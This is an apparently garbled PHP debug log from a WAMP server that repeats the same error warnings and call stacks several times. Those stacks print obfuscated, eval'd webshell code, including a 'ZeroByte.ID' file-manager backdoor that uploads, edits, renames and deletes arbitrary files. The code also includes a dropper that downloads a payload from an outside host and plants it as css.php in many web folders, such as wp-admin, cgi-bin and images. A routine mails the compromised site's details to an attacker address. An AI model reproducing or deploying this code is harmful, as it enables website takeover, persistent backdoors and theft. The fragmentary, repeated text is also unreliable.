'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.1443539504fclose ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:117 not exitsdone .
( ! ) Warning: fopen(C:/wamp64/www/sites/css.php): failed to open stream: No such file or directory in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 125
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0015521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.1642539504fopen ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:125
( ! ) Warning: fwrite() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 126
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0015521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.1680539504fwrite ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:126
( ! ) Warning: fclose() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 127
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0015521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.1712539504fclose ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:127 not exitsdone .
( ! ) Warning: fopen(C:/wamp64/www/css/css.php): failed to open stream: No such file or directory in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 135
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0015521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.1922539816fopen ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:135
( ! ) Warning: fwrite() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 136
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0015521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
